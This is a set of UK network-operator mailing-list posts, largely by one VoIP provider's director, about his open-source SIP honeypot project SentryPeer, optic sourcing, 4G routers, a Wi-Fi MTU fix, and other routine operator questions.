[uknof] SentryPeerHQ
Hi all, I've just released https://sentrypeer.com which some of you might find useful: About SentryPeerHQ -> https://sentrypeer.com/about Fully Open Source -> https://github.com/SentryPeer/SentryPeerHQ Always free -> https://sentrypeer.com/pricing (for those that contribute data by running an official SentryPeer node or their own honeypot) Thanks, Gavin.
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
Hi all, Come a long way since Nov: https://github.com/SentryPeer/SentryPeer/releases/tag/v1.4.0 Peer to peer bad_actor replication is now released. Deutsche Telekom "T-Pot - The All In One Honeypot Platform" included SentryPeer (https://github.com/telekom-security/tpotce/tree/22.x) and Kali Linux is coming - https://bugs.kali.org/view.php?id=7523#c15939 Would love to have some testers onboard! Thanks, Gavin.
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
> > https://github.com/SentryPeer/SentryPeer > > I haven't delved into the p2p protocol side of things, but as a long > time C programmer I'd be extremely wary of starting a large new project > with it. Especially one that is designed to be exposed to attackers. An > opportunity to learn Go or Rust perhaps? Hi Jonathan, I had quite bad analysis paralysis for exactly that reason. I know Go and have just recorded a show for SE Radio ( https://www.se-radio.net/team/gavin-henry/) with Tim about Rust (Tim's book - https://www.manning.com/books/rust-in-action ). I thought about both, and looked at the state of the SIP libraries, Peer to Peer libs and BGP ones. Rust seems to be suffering with Mozilla re-work and now: "The entire moderation team resigns, effective immediately. This resignation is done in protest of the Core Team placing themselves unaccountable to anyone but themselves." - 4 days ago https://github.com/rust-lang/team/pull/671 The libp2p looked great too for Go and Rust - https://libp2p.io/ but there's one company behind it https://protocol.ai/ and I really enjoyed this https://zguide.zeromq.org/docs/chapter8/ I'd also looked at Elixir, but various things I wanted to achieve kept pulling me back to C. I enjoyed recording this with Jens too https://www.se-radio.net/2020/06/episode-414-jens-gustedt-on-modern-c/ and am speaking to Robert Seacord on Secure Coding in C ( https://en.wikipedia.org/wiki/Robert_C._Seacord) next month and Daniel who created curl after that. curl is 25 years old. Go isn't. Rust is 5 or so. I'm sure everyone here has been burnt by framework X going away. C won't. My goal is longevity and pretty much what I say in the README.md - https://github.com/SentryPeer/SentryPeer/blob/main/README.md "I started this because I wanted to do C network programming as all the projects I use daily are in C like PostgreSQL, OpenLDAP, FreeSWITCH, OpenSIPS, Asterisk etc. See Episode 414: Jens Gustedt on Modern C for why C is a good choice." and so far, it's been the right choice for examples I'm following, books I have and places this project can run and be built. And honestly, I like the level of control and minutiae. But, the prototype of SentryPeer was done in a few days...(https://github.com/SentryPeer/SentryPeer/tree/main/prototype). Once I had made the decision, it felt right and I cracked on. Lastly, I think you can still write unsafe code in C, but with the IDE you use, CI/CD (https://github.com/SentryPeer/SentryPeer/actions) and all the scanning tools, you should catch most things. It's easy to write unsafe Rust or Go too - https://www.computer.org/csdl/proceedings-article/icse/2020/712100a234/1pK5e6OTqJa We talk about this in the upcoming Rust show. Not all of SentryPeer has to be in C. I think there's a place for C, Go and Rust in this or whatever, but I wanted to use C and that's the option you get when you start something. Choices, warts and all :-) Remember, most of the problem spaces discussed in this email thread have nothing to do with Cyet Thanks, Gavin.
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
> > Maybe we can submit our HP data to your API > > I think having a way to side load data would be amazing once a > spec/schema has been done. Ideas? The SQL schema is basic :-) https://github.com/SentryPeer/SentryPeer/blob/main/src/database.c#L11
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
> Hello Hi Leo! > We built the same! Awesome. Code to share? > Maybe we can submit our HP data to your API I think having a way to side load data would be amazing once a spec/schema has been done. Ideas? > good stuff Thanks for reading :-) > Leo
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
> This looks like a neat project and it is great that you've open sourced it. I > can see how it would be useful for folks that want an open source solution to > deploy their own honeypots and feed that back into private blocklists. Thanks Rob. > On a wider, shared blocklist level, this seems like a relatively simple > problem to solve, but the parallels with email spam are hard to avoid. I know. Especially the p2p part. > There have been a few similar blocklists including the ITSPA/Comms Council > Cargill & Cox DNS based project whose name temporarily escapes my braincells, > and the apiban project (Fred Posner - Kamailio, LOD) which seems to be > gaining some traction. snitch, but that is a passive pcap tool. I wanted batteries included. yep, I like APIBAN, but all the data sits there. It is free and centralised. Clients are open source. No phone numbers. > I guess the feature of your project is the open federation protocol, but I > think there are reasons that most approaches to this kind of filtering are > behind a curtain controlled by gatekeeper and Matthew covered most of them. > There is a very high trust bar for most providers to import filtering > decisions into their network, and I can't think of any non-curated approach > that has ever flown. > There are much smarter people than me that will have solved this I'm sure. I think it's the "rules based" approach, vs ML approach etc. I just want to get the data in folks hands and I think the filtering part will solve itself. > It will be interesting to see how this pans out though, certainly looks like > a great learning and data collection project. That's why I've started it. I've already learned a ton! Packaging it for one!
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
>> Working on the API and web UI next, then the p2p part of it. Feel free >> to submit any feature requests or have a play :-) > Hi Matthew, Thank you very much for your reply and time spent thinking about all of the below. Much appreciated! > P2P sounds ripe for abuse by bad actors... A few scenarios: That's correct. I think the authz/authn issues have already been solved in other places. I'm thinking about things like signing up on StackOverflow or Reddit and what you can do the first time without any reputation etc. Similar to email. I was chatting to Justin Richer (https://www.se-radio.net/2019/08/episode-376-justin-richer-on-api-security-with-oauth-2/) about this last month: "I took a look at the peer project and it sounds interesting. A lot like BitTorrent’s protocol, but with the sharing at a higher level, it seems? So it might be worthwhile researching into how graph networks like that determine trustworthiness of nodes. Most of them have a kind of distributed consensus state that gets reached after some time, and so there’s no client authentication needed within the network itself because the clients will be identified by some ephemeral key and trusted based on actions instead of a pre-registration. Still, there are a few different efforts that are dealing with bridging registration type questions in the OAuth and related spaces. OAuth 2 assumes clients all have client IDs and they’re pre-registered. The Dynamic Registration spec (RFC7591) allows that registration to happen programmatically as a discrete pre-step, but it also allows the client to present a signed assertion (the software statement) that helps the client claim that it is legitimate. An extension to OpenID Connect recently introduced the idea of the client sending a “registration” object with the initial request to the AS, to provide a drive-by registration in a single step. The client would get a client ID out the other end if it’s successful. I haven’t seen this applied in practice anywhere yet. The OpenID SIOP group has been discussing overloading the Client ID parameter itself to contain semantic information allowing the client to send an identifier that the AS could use to fetch client registration information. This subverts the idea of the client ID as understood by most implementations (it’s now client-supplied and meaningful instead of AS-supplied and opaque to the client). The frontrunner here is using DIDs and DID documents to convey stuff, but that’s mostly because that’s the tech this crowd currently likes a lot. In GNAP we’ve inverted the registration requirement a bit — the protocol’s set up to assume that you’re coming in with no previous registration, so you can send any client information necessary during the initial request, and that initial request always happens the same way regardless of how the interactions and other next steps go. But there’s an optimization for cases when you :do: have a pre-registered client, so that you can send the ID instead of the client info itself. I’m not sure how much of that actually applies to what you’re working on, based on my very limited understanding of what you’re doing, but I hope it’s helpful. Good luck with the project!" > 1. You only get the list if you provide a list of your own. Therefore, > someone adds some random IPs into a list, then knows what the state of the > network is, and as soon as the IP they're using appears on the list, they > stop using it until it drops back off. True. The IP address harvesting is one thing, but stage two when they actively try to make phone calls will always happen as it's too lucrative not to. That's the data I'm also interested in getting and sharing. Folks that run the nodes will be able to add their own phone number allocations and I'm thinking about using the various RIR feeds etc. RPKI. Again, I think this is a solved problem, I just need to find the right place to look. > 2. IPv6 means presumably blocking /64s at a time rather than individual > addresses, I don't know if privacy addressing etc is a thing in the telephony > market, where addresses rotate after a while? Not sure yet. > 3. CGNAT means you might affect more than you intended, and the problem will > only get worse over time. How is this currently handled with an infected PC behind CGNAT? That's a solved problem? > 4. If the source IP is just a compromised device, you've booted that person > (who may be an entire office) off SIP for a week or more, even if they fix > the issue. You don't need to block them, but depending on what the ITSP wants to do, they could get limited service etc. > Additionally, from a feature POV: > > 1. BGP sounds like a needless over-complication. Surely just some iptables > (realistically: nftables) hooks would do? Both. Depends on how you run your nodes. The BGP part I just like the thought of and want to explore. > 2. A user is never going to pay for all data collected if it's available via > P2P, and if it isn'
[uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
Hi all, I hope you don't mind the post, but thought this might be of use and in the spirit of release early, release often I've done an alpha release: https://github.com/SentryPeer/SentryPeer There's a presentation too if you'd like to watch/read where I hope to go with this: https://blog.tadsummit.com/2021/11/17/sentrypeer/ Working on the API and web UI next, then the p2p part of it. Feel free to submit any feature requests or have a play :-) Thanks for reading and any feedback is welcome! -- Kind Regards, Gavin Henry. -- Kind Regards, Gavin Henry.
Re: [uknof] ADVA optic
Thanks all. Adva got back to me and sent one direct via Sol Distribution. £48 inc vat and del. On Wed, 9 Dec 2020 at 22:28, David Croft wrote: > Adva don't sell direct, try Infradata https://www.infradata.co.uk/ > > David > > On Sun, 29 Nov 2020 at 14:54, Gavin Henry wrote: > > > > Hi all, > > > > Long story short, an optic in a OR supplied GE102Pro (H) > > (fsp-150-ge-100-pro) has been swapped and doesn't work (we didn't find > > out for ages that it's an LX one). We've taken one from a unit not yet > > live in the same rack, but need to get a replacement. OR will charge a > > site visit etc. (so I'm told), so I just want to get a replacement. As > > seen in the picture attached it's a: > > > > adva sfp/gbe/850i/mm/lc 0061003006 > > > > I was looking at this, but Flexoptix can't key the same type and > > suggest a generic one: > > > > > https://www.flexoptix.net/en/sfp-sx-transceiver-1-gigabit-mm-850nm-550m-7db-ddm-dom.html?co3066=18152 > > > > and ProLabs haven't got back to me on this price: > > > > > https://www.prolabs.com/products/transceivers/adva/sfp/1000base/0061003006-c > > > > fs.com say this will work, but it's to go direct to the customer so I > > want to be 100% certain: > > > > https://www.fs.com/uk/products/75332.html > > > > Do ADVA sell them directly as they haven't got back to me? There's a > > ton on eBay, but I wanted to get a new one. Any recommendations? I > > need one by Friday 4th Dec. > > > > Many thanks, > > Gavin. > -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 330 44 50 000 D +44 (0) 330 44 55 007 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp:// pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] ADVA optic
Hi all, Long story short, an optic in a OR supplied GE102Pro (H) (fsp-150-ge-100-pro) has been swapped and doesn't work (we didn't find out for ages that it's an LX one). We've taken one from a unit not yet live in the same rack, but need to get a replacement. OR will charge a site visit etc. (so I'm told), so I just want to get a replacement. As seen in the picture attached it's a: adva sfp/gbe/850i/mm/lc 0061003006 I was looking at this, but Flexoptix can't key the same type and suggest a generic one: https://www.flexoptix.net/en/sfp-sx-transceiver-1-gigabit-mm-850nm-550m-7db-ddm-dom.html?co3066=18152 and ProLabs haven't got back to me on this price: https://www.prolabs.com/products/transceivers/adva/sfp/1000base/0061003006-c fs.com say this will work, but it's to go direct to the customer so I want to be 100% certain: https://www.fs.com/uk/products/75332.html Do ADVA sell them directly as they haven't got back to me? There's a ton on eBay, but I wanted to get a new one. Any recommendations? I need one by Friday 4th Dec. Many thanks, Gavin.
Re: [uknof] ADVA optic
Apologies, resent without image attachment in case it got blocked. Thanks.
Re: [uknof] 4G routers that can be centrally managed
> > Thanks. Mostly Mikrotik recommendations at the moment. Will take a look at those too. >
Re: [uknof] 4G routers that can be centrally managed
Thanks for the MikroTik recommendations.
[uknof] 4G routers that can be centrally managed
Hi all, I'm looking for recommendations of low cost routers with a bit of management. I'm not sure if these should be ubnt or meraki style with 4G exit points or all SIM enabled, or regular routers with a dongle. It's part of an Aberdeen City Digital Inclusion programme (hence extremely lost cost where broadband just isn't affordable) but could be part of the Scottish Government lead ‘No One Left Behind in a Digital Scotland’ programme too. Thanks, Gavin. -- Kind Regards, Gavin Henry. https://www.surevoip.co.uk
Re: [uknof] COVID-19 offers of help and network changes
Sounds good to me.
Re: [uknof] COVID-19 offers of help and network changes
> Reminds me (in a another life) of giving transit to a few folks who lost out > during 9/11 for free - Fantastic that you guys are offering this free! Well > done! We're a community here, as you know. I haven't been able to get to a UKNOF or LINX/LONAP face to face for a long time now as my son Ben (a bit about me and Ben - https://www.bbc.co.uk/programmes/p06rqp6c ) is disabled and it's near impossible to do overnights. This email was the only thing I could think of to show my support to everyone - sharing knowledge. Gavin.
Re: [uknof] COVID-19 offers of help and network changes
> Bravo, Gavin, Thanks! > I’m just about to write to my customers offering the same thing. > > As a return, we do firewalls, networks (Enterprise or SP) and IPT. I'm putting out an email tomorrow to customers, partners and resellers as the amount of emails today from folks that don't realise they can just unplug their desk phone and plug it in at home. Of course, there will be those that just sell them new ones of softphones, but still. A bit of friendly free education will go along way. Gavin.
[uknof] COVID-19 offers of help and network changes
Hi all, We're a small company of 7. 4 of us are now working from home, others to decide, but the option is there. I know everyone is probably extremely VoIP savvy, but if any one needs any help or advice about setups at home etc. feel free to reply here of off-list. If there's anything else I can help with, albeit being a small network operator, just let me know. Has anyone seen any big demands yet? I've been following NANOG and the Italian graphs. Thanks, Gavin. -- Kind Regards, Gavin Henry. Managing Director. SureVoIP - https://surevoip.co.uk
Re: [uknof] why aren't we giving /31 to customers
No idea. Our leased line/ethernet customers get a /31. CPE are Juniper SRXs, some Mikrotik using that /32 hack or just DrayTek. No problems. Then we charge extra for more IPv4. IPv6 comes with it.
Re: [uknof] Ubnt and iOS 12 help
Hi all, Forgot to follow up on this for others. You were all right!!! Needed: set security flow tcp-mss all-tcp miss 1350 to reduce TCP MISS from what we had for most setups which was 1438. https://blog.apnic.net/2014/12/15/ip-mtu-and-tcp-mss-missmatch-an-evil-for-network-performance/ Cheers.
Re: [uknof] Getting rid of old kit
> > If you don't need BGP and can live with static routes, it's a good box. > > Mark. > The mx204? >
Re: [uknof] Getting rid of old kit
On Wed, 6 Nov 2019 at 14:40, James Bensley wrote: > > On Wed, 6 Nov 2019 at 14:10, Gavin Henry wrote: > > I think there > > are folks that buy old Juniper kit for resale? > > Yes, Juniper ;) Although, that is usually as part of a new purchase, > they don't just buy old Juniper kit for nothing. > > Seriously though, following Job's suggestion of a hackerspace, if you > want to donate them you could reach out to NetNI/NetMcr/NetLnd and see > if they have any young network engineers that could use them for a > home lab / cert training. I'll add that to my options list. Thanks all for the suggestion.
Re: [uknof] Getting rid of old kit
Hi Job, Thanks. Yeah, I agree. I'd like someone to use them since they cost a bomb in 2013. We're just using them mainly for VoIP traffic and a handful of ethernet and FTTC supporting circuits, but we've just won a chunk of new business which will pay for our upgrade. Gavin.
[uknof] Getting rid of old kit
Hi all, We're replacing two MX5's with two MX204's next month. What do you guys do with old kit? None of our enterprise customers that could use them want them and we aren't going to repurpose them. I think there are folks that buy old Juniper kit for resale? Thanks for any suggestions. Gavin.
Re: [uknof] Ubnt and iOS 12 help
I'll also add that we watch it pick up via DHCP and hit our website and DNS servers, but then started to timeout on the redirect. So it's getting out OK like the rest of non-iOS devices. MTU does seem to fit.
Re: [uknof] Ubnt and iOS 12 help
> On Tue, 17 Sep 2019, 16:29 Dan Kitchen, wrote: >> >> Sounds like an MTU issue to me. > > > +1 > Possibly coupled with high packet loss > > I've had a few people come to me recently with Wi-Fi problems on devices, and > they're on 2.4GHz Wi-Fi and using Bluetooth. Turning off Bluetooth or > switching to 5GHz Wi-Fi improves things drastically. My guess is that newer > chips share the 2.4G radio rx/tx and don't do a very good job. > Hi all, So we tried bluetooth off. No luck. Bought a new 5GHz - https://www.ui.com/unifi/unifi-ap-ac-lite/ with cloud key and it didn't work. They took that home and tested on a Sky router and it worked with the same iPhone (awaiting make/model and settings). Seems to be our network then. Where this works on my own set up, it is BTW FTTC. This set up is via our TTB FTTC links, same MTU though of 1492 for all FTTC links. I'm going tomorrow with an iPhone 8 with the new iOS 13.1 on it to test that has never seen this network. There is a pair of SRX220H2s there and at home is a SRX100H2, same settings and controller versions and disc firmwares. No URL filtering or anything like a Juniper KB points to: https://kb.juniper.net/InfoCenter/index?page=content&id=KB29239 Any other ideas? Will report back. Thanks, Gavin.
Re: [uknof] Ubnt and iOS 12 help
On Tue, 17 Sep 2019 at 16:20, Martin Hepworth wrote: > > What firmware level ? Controller 5.11.39 Disc 4.0.54.10625 Thanks.
[uknof] Ubnt and iOS 12 help
Hi all, Any Unifi AP experts out there? Been through hoops with 4Gon and their premium support. Been through all the ubnt forums and email support. Done a new VM and Controller install via backup conf. 4Gon suggest 5GHz APs, but hard to convince them. This is a small charity install of 5 x 2.4Ghz APs and 3 x 2.4 Ghz AP-LR that are working for Android, Windows and Macs. These *have been* working fine for iPhones and iPads. Symptom Summary iPhone / iPad iOS 12 * Will not load youtube and timeout * Loading a website via Safari will timeout * Facebook and Whatsapp work fine * Will not connect to download update from Apple Both have been taken off site and work fine via other Wi-Fi deployments. It sounds like DNS almost with the Facebook/WhatApps. I've seen the "prompting for password all the time", but it's not that. They associate OK. We supply the routers, switches and FTTC. Happy to pay for some support. Thanks, Gavin.
Re: [uknof] BT/EE and Vodafone - why the split?
> > > > > "kicked [them] off their network" in what context of network? > > https://aastatus.net/27798 - this will relate to the EU SIP2SIM cards > which use Vodafone NL. > We don't use that service, but that's the only public link I could find. I think that's a Manx service. But yeah... >
Re: [uknof] BT/EE and Vodafone - why the split?
You can see more here: https://aastatus.net/27798 " We're sorry for the short notice, but we've been given short notice. The reason for this is due to an ongoing commercial dispute between Vodaphone Group and EE UK."
Re: [uknof] BT/EE and Vodafone - why the split?
Hi Neil/Tom, In regards to roaming agreements. Vodafone isn't allowed to roam on to the EE network anymore since a week ago today at 5pm. I'm trying to learn more. Thanks. On Fri, 8 Feb 2019 at 06:36, Neil J. McRae wrote: > EE is just a brand so not sure what you mean - kicked them off? > > Regards, > Neil. > > Sent from my iPhone > > On 7 Feb 2019, at 22:31, Gavin Henry wrote: > > Hi all, > > Does anyone have an insight as to why EE kicked Vodafone off their network > last Friday at 5pm? > > Thanks, > > -- > Kind Regards, > Gavin Henry. > https://surevoip.co.uk > > -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 330 44 50 000 D +44 (0) 330 44 55 007 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp:// pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] BT/EE and Vodafone - why the split?
Hi all, Does anyone have an insight as to why EE kicked Vodafone off their network last Friday at 5pm? Thanks, -- Kind Regards, Gavin Henry. https://surevoip.co.uk
Re: [uknof] Internet Instability between 11:01 - 11:13 GMT?
> Dear Giles, > > On Tue, Feb 05, 2019 at 12:12:58PM +, Giles Coochey wrote: > > We saw a blip with our peering with AS61231 (SSE), anyone else > > experience any BGP strangeness around 11:01 - 11:13 GMT today? > > I've heard quite some people report that their EBGP sessions with Level3 > / AS 3356 flapped around that time. You may have seen second order > effects from such instability? > > I don't have more details. We saw our Level3 BGP sessions go down in Telehouse East.
Re: [uknof] OpenReach CP Customer Establishement
Good luck Leigh. We’re a long-standing Wholesale Partner who also wanted to use Openreach services, so tried the establishment process. Openreach wouldn’t even return our calls. It’s over two years now (yes, really) of chasing and emails ignored, phone calls not returned, so zero progress. Same here. We took years for WLR3 and almost the same for our SS7 interconnects, but to be honest most delays were our side not following the massive documentation process. Only advice would be to get your account managers name address and (home phone number) and do everything in a timely fashion. I did have to complain a lot though about slowness to move things forward at the start. Gavin.
Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP
On 20 March 2017 at 10:28, Stuart Henderson wrote: >> Original message >> From: Jack Kay >> >> Maplins appear to sell patch leads but no optics.. helpful. > > On 2017/03/20 09:13, Peter Knapp wrote: >> You cant really expect them to sell sfps though given branded >> manufacturers are all device coded (including Advas) > > Maybe flexoptix could do a deal with them :) > Yeah, that's what we use on our Junipers too. Why not have the copper SFP as a default, or have the ethernet live (need to check the ADVA model, it's probably only 100mb/s) and leave it to the customer to swap it if they need a longer run? Normally the rj45 sfp cost more though, so that will be why no doubt. Thanks.
Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP
Evening, Well, the layer 2 provider into us is SSE and the tail is Openreach. For a "small fee" SSE are arriving tomorrow with an SFP and patch lead. Sorted. Thanks all!
Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP
On 18 Mar 2017 17:46, "Neil J. McRae" wrote: Is it a 1G circuit ? Yeah, all cleared up (see my earlier reply). Sent from my iPhone > On 18 Mar 2017, at 17:23, Gavin Henry wrote: > > Hi all, > > OR didn't deliver RJ45 presentation like requested and our customer is > trying to get this up at the weekend > > Anyone based round Arlington Business Park, Stevenage with some? > > Thanks. > > -- > Kind Regards, > Gavin Henry. >
Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP
Hi Simon, Yeah, it is. I've double checked our provisioning ticket and carrier order. It's all clear that it's an SM fibre end at the NTE and the customer was informed and accepted. Sorry for the OR comment, the carrier got my hopes up saying ethernet was requested but not delivered and they raised a fault. So, customer needs an sfp and patch lead by Monday...hmmm..why do they do this at weekends and not tell you so you can advise. Thanks. On 18 Mar 2017 17:41, "Simon Lockhart" wrote: On Sat Mar 18, 2017 at 05:14:40PM +, Gavin Henry wrote: > OR didn't deliver RJ45 presentation like requested and our customer is > trying to get this up at the weekend If it's GigE presentation on an EAD, then fibre is the only choice. You can choose between multimode and singlemode, though :) Simon
[uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP
Hi all, OR didn't deliver RJ45 presentation like requested and our customer is trying to get this up at the weekend Anyone based round Arlington Business Park, Stevenage with some? Thanks. -- Kind Regards, Gavin Henry.
[uknof] Looking Glass
Morning all, Does anyone have any recommendations for a decent open source software looking glass project they have used? Thanks. -- Kind Regards, Gavin Henry.
Re: [uknof] Jon Boyer or Jon Blank - ipv4hosting.com
On 19 Sep 2016 22:13, "Hal ponton" wrote: > > They've emailed everyone of our addresses so far today abuse / webmaster / lir you name it. > -- And their unsubscribe is a non-mailinglist email. Yeah, sure. Thanks.
[uknof] Jon Boyer or Jon Blank - ipv4hosting.com
Evening all, If anyone knows either of these, tell them to go away! Anybody else had 3 emails from them today? -- Kind Regards, Gavin Henry. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] IX-Reach / Console - gone down hill?
> Nicola Dux (one of their AMs) conceded, at the last LINX meeting, that this > is was not the first time she has heard this complaint. We joined Allegro for a port up to IXManchester and to be on SNAPConnect. Poor Nicola has been trying to get some basic questions answered for us, like can we still order a VLAN between members etc. That was on the 16th August -- Kind Regards, Gavin Henry. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Tracking BT MCT progress for VDSL hardware
> the actual MCT form is: > http://www.formwize.com/run/survey3.cfm?idx=505d040c0e0a0e > > That's one long form -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 330 44 50 000 D +44 (0) 330 44 55 007 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp:// pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Multi-tenant PBX Solution
On 9 August 2016 at 22:18, Richard Smith wrote: > Apologies for top posting all... Mobile device responses and all... Excuse > perceived brevity et al > > My comments and objections, to the general consensus that Asterisk is the > way forward, are based on several years of working with it. > > As I've mentioned before, I generally try not to pass comment on specific > products because a number of my customers use a variety of products to > fulfil a business need/function. To blithely pass judgement on things > without consideration of individual business cases would just be > unprofessional. > > That said... My objections to asterisk are based on direct experience that > using it as the core function of a service is nigh-on impossible to build as > a stable and generally functional high availability platform. I think this is OT now for the OP as Paul was asking for their own company use, not to use as a base for an ITSP or VoIP Service Offering within an ISP? > Asterisk lacked the capability (this may have changed and if so, someone, > please direct me to the relevant documentation that supports your > assertions) to function as a high availability and performant (IMO > performant = >5k registrations with subscribe and notifies etc + >>50calls/sec) cluster capable of providing type 2/type 4 services which > complies with the mandates for OFCOM General Condition 4 (and subsequently > section 102 and 105 (I think) of the telecommunications act 2003). It's core function, although it is described on asterisk.org as "An open source telephony switching and private branch exchange service for Linux." is mainly as a b2bua and media translation platform. As you know it can be used for many, many other things. Asterisk 13 is now much better due to the option of not use chan_sip and opting for chan_pjsip. pjsip is a lovely OSS project. > I agree, asterisk has a place... It is not however at the core of a > multi-tenant platform marketed as a cloud (urg) replacement for POTS > services. You just wouldn't design a solution with Asterisk doing everything anyway. Whether it's Asterisk, FreeSWITCH, Yate or the many others, they all have their place in the stack and all known limitations can be tested, documented and worked round with SIP Proxies as registrars, load balancers, presence platforms and all the other things SIP Proxies should be used for. It just depends on what scale you are designing for or moving to/from. Again, http://mcfunley.com/choose-boring-technology It's an amazing platform as is FreeSWITCH, OpenSIPS, Kamailio and all the other Open Source and Free Software projects out there that form part of an ITSP/ISP and are mature and have active development. We live in lucky times to have so much choice. Anyway, this is probably better placed on UKNOT list now. -- Kind Regards, Gavin Henry. Managing Director. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider
Re: [uknof] Multi-tenant PBX Solution
> However, it's worth noting that if you're going to be using Asterisk and selling the product to your customers who will in turn rely solely on your product for telephony, you need to make sure you're very aware and up to speed on the legal aspects. > I would replace the word Asterisk with the words "software based product" in the above paragraph. > From what I've seen implemented, read up on and inevitably replaced, it's incredibly difficult to build a solution using Asterisk that would be able to survive the test of general condition 4.[2] > ^^^ This applies to any software stack solution. It is your own due diligence to test and adopt any solution. Whether it's Asterisk or not. It is fair to say that there have a lot of bad Asterisk solutions out there, but it's not supposed to be used for everything. It's usually provided as the A in a LAMP stack but there's so much more needed if selling a landline replacement service, as Richard points out. > Forget the shiny web UI, the billing interfaces, systems operations, etc; if you can't maintain an call and lose half your network, you're setting yourself up for a number of very big (and potentially expensive) headaches. > Again, not specific to Asterisk or its known weaknesses - http://mcfunley.com/choose-boring-technology I'm the opposite. Asterisk has its place and should only be bashed when you've experienced it. I think Richard has experienced it though :) Gavin. -- Kind Regards, Gavin Henry. Managing Director. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider
Re: [uknof] Multi-tenant PBX Solution
Hi Paul, Have a look at the voiceops mailing list. There was a big thread this year about this. Usually one every year. Depends on your requirements re proprietary software and/or open source stacks. Interesting reading though, with lots of options. Thanks.
[uknof] SeaMeWe-3 owners
Hi, If you are from any of the following companies, can you contact me offlist for a quote regarding a customer we have that is coming in to us on this cable: Orange BT Eircom Sri Lanka Telecom Tata Communications Verizon Sprint Vodafone Deutsche Telecom Thanks muchly! -- Kind Regards, Gavin Henry. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] WLR3 BTOR TPI companies
Evening all, I presume some of you will be using one of these: Choosing a Third Party Integrator (TPI) : The following is a list of operationally active TPIs who have an approved and working WLR3 interface solution with Openreach. They have brought customers through the WLR3 product establishment process: * Aurora Kendrick James - www.aurorakendrickjames.com ; www.akjl.co.uk * General Dynamics (previously known as Vangent Ltd) - www.gdit.com * Kofax Limited (previously known as Singularity) - www.kofax.com * Strategic Imperatives - www.imperatives.co.uk * Union Street Technology - www.unionstreet.uk.com ] Any to avoid? I also remember my email about doing an OSS integration last year. Thanks. -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 330 44 50 000 D +44 (0) 330 44 55 007 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] StackStorm
